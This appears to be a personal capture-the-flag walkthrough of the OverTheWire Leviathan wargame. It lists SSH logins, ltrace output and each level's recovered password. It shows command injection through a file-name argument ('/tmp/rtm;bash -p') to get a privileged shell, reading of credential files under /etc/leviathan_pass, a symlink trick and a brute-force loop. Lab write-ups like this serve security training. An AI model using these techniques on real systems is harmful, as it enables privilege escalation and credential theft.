https://overthewire.org/wargames/leviathan/
GitHub: https://github.com/JohnHammond
https://programmercave0.github.io/blog/2020/01/06/Leviathan-Level-0-to-Level-1-OverTheWire
https://www.youtube.com/watch?v=v2xuEtvqN_0&list=PL1H1sBF1VAKVsJ0dIDJzZw_QmO1J02YvG
  
/etc/leviathan_pass = various level passwords.

 
SSH Information
      Host: leviathan.labs.overthewire.org
      Port: 2223



Level 0
 ssh leviathan0@bandit.labs.overthewire.org -p 2223
 password: leviathan0
Write up:
1. ls  -la
   output:
    drwxr-x---  2 leviathan1 leviathan0 4096 Aug 26  2019 .backup
2.  cd .backup
    ls -la
      output:
     -rw-r----- 1 leviathan1 leviathan0 133259 Aug 26  2019 bookmarks.html
3. grep --color=always  "pass" bookmarks.html 
   output:
 ....  This will be fixed later, 
    the password for leviathan1 is rioGegei8m" ADD_DATE=......... 

password: rioGegei8m


leviathan0  Level 1
  ssh leviathan1@bandit.labs.overthewire.org -p 2223 
  password: rioGegei8m

Write up:
 1. ls  -la
   output:
    .....   -r-sr-x---  1 leviathan2 leviathan1 7452 Aug 26  2019 check
 2.  ./check
     output:
       password: assfdv
       Wrong password, Good Bye ...
   So we can't  find passward  this way
3.  ltrace ./check
    enter test 
     output:
    ....strcmp("tes", "sex")      = 1
     puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
 
   It compares test with sex. This means sex is the password the binary file need.

4.  ./check
  enter sex 
  now we are in root shell  
5. cat /etc/leviathan_pass/leviathan2 
     output:
       ougahZi8Ta  



leviathan2   
ssh leviathan2@bandit.labs.overthewire.org -p 2223 
  password:  ougahZi8Ta

Write up:
 1. ls
  output:  printfile

 2. ltrace ./printfile '/etc/leviathan_pass/leviathan2'  # We have  permission to  this  file
    output:
	 __libc_start_main(0x804852b, 2, 0xffffd764, 0x8048610 
 	access("/etc/leviathan_pass/leviathan2", 4)      = 0
 	snprintf("/bin/cat /etc/leviathan_pass/lev"…, 511, "/bin/cat %s", "/etc/leviathan_pass/leviathan2") = 39
	geteuid()                                        = 12002
 	geteuid()                                        = 12002
 	setreuid(12002, 12002)                           = 0
 	system("/bin/cat /etc/leviathan_pass/lev"…ougahZi8Ta
  
 	--- SIGCHLD (Child exited) ---
 	<… system resumed> )                           = 0
 	+++ exited (status 0) +++

   
   Reviewing the ltrace, it can be determined:

     ./printfile accepts a filename argument.
      /bin/cat is used to output the requested file.
      access() checks if user leviathan2 has sufficient permissions.(mode =4)
      A string is prepared using snprintf(), concatenating /bin/cat with the supplied argument.
      setreuid() sets the real and effective UID of leviathan3.
      system() call supplied with the above string.


3.Attempting to run the printfile executable supplied with leviathan3‘s password file we are met with an error:

  ltrace ./printfile '/etc/leviathan_pass/leviathan3'#  # We do not have  permission to  this  file
  output:
       ....
       access("/etc/leviathan_pass/leviathan3", 4)      = -1
       puts("You cant have that file…"You cant have that file…
       )               = 27
      +++ exited (status 1) +++


  In this case, user leviathan2 does not have the necessary permissions to access a file owned by leviathan3.
  
  
4.  touch /tmp/rtm;bash -p #   use a - “;” to add a second command that spawn a shell.
  ./printfile '/tmp/rtm;bash -p'
  whoami 
       output:leviathan3
  cat /etc/leviathan_pass/leviathan3   
        output:Ahdiemoo1j
  
 
leviathan3  
ssh leviathan3@bandit.labs.overthewire.org -p 2223 
  password: Ahdiemoo1j
  
  1. ls -lah
     output :
        -r-sr-x---  1 leviathan4 leviathan3  11K Aug 26  2019 level3

  2. ltrace   ./level3
     output :
       
       __libc_start_main(0x8048618, 1, 0xffffd794, 0x80486d0 <unfinished ...>
      strcmp("h0no33", "kakaka")                                                = -1
      printf("Enter the password> ")                                            = 20
      fgets(Enter the password> h0no33
      "h0no33\n", 256, 0xf7fc55a0)                                        = 0xffffd5a0
      strcmp("h0no33\n", "snlprintf\n")                                         = -1
      puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG
       )                                                = 19
      +++ exited (status 0) +++

   3. 
     The function strcmp compares test with snlprintf means the password is 'snlprintf'.
      ./level3 
       password ----> snlprintf

   output :
      
     Enter the password> snlprintf
     [You've got shell]!
   4.
      cat /etc/leviathan_pass/leviathan4  
      vuH0coox6m


leviathan4 Level 4 → Level 5
 

ssh leviathan4@bandit.labs.overthewire.org -p 2223 
  password: vuH0coox6m

 1. ls  -lah
   output :
         dr-xr-x---  2 root leviathan4 4.0K Aug 26  2019 .trash
2. cd .trash
3. ./bin
   output :
     01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010
3.  python3
    import binascii
    binary_str = '0101010001101001011101000110100000110100011000110110111101101011011001010110100100001010'
    n=int(binary_str,2)       # n= 102047764659378522658531594
    n.to_bytes((n.bit_length() + 7) // 8, 'big').decode()
  output :
  'Tith4cokei\n'

leviathan5 Level 5 → Level 6
ssh leviathan5@bandit.labs.overthewire.org -p 2223 
  password: Tith4cokei

1. ls 
    -r-sr-x---  1 leviathan6 leviathan5 7560 Aug 26  2019 leviathan5

2. ./leviathan5
     Cannot find /tmp/file.log

3.   
     ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
   # make the file /tmp/file.log a symbolic link to /etc/leviathan_pass/leviathan6

4. /leviathan5
    output:
      UgaoFee4li


leviathan6 Level 6 → Level 7
ssh leviathan6@bandit.labs.overthewire.org -p 2223 
  password:UgaoFee4li

1. ls -lah
   -r-sr-x---  1 leviathan7 leviathan6 7.3K Aug 26  2019 leviathan6
2 ./leviathan6 
     output:
    usage: ./leviathan6 <4 digit code>
3. for i in $(seq 0000 9999); do ./leviathan6 $i ; done # bruteforce the  4 digit code
4. The above code is stop when digit code is 7122 and we are log in as leviathan7
     we can check using command whoami.
5.cat /etc/leviathan_pass/leviathan7
 output:
 ahy7MaeBo9

END OF GAME
  
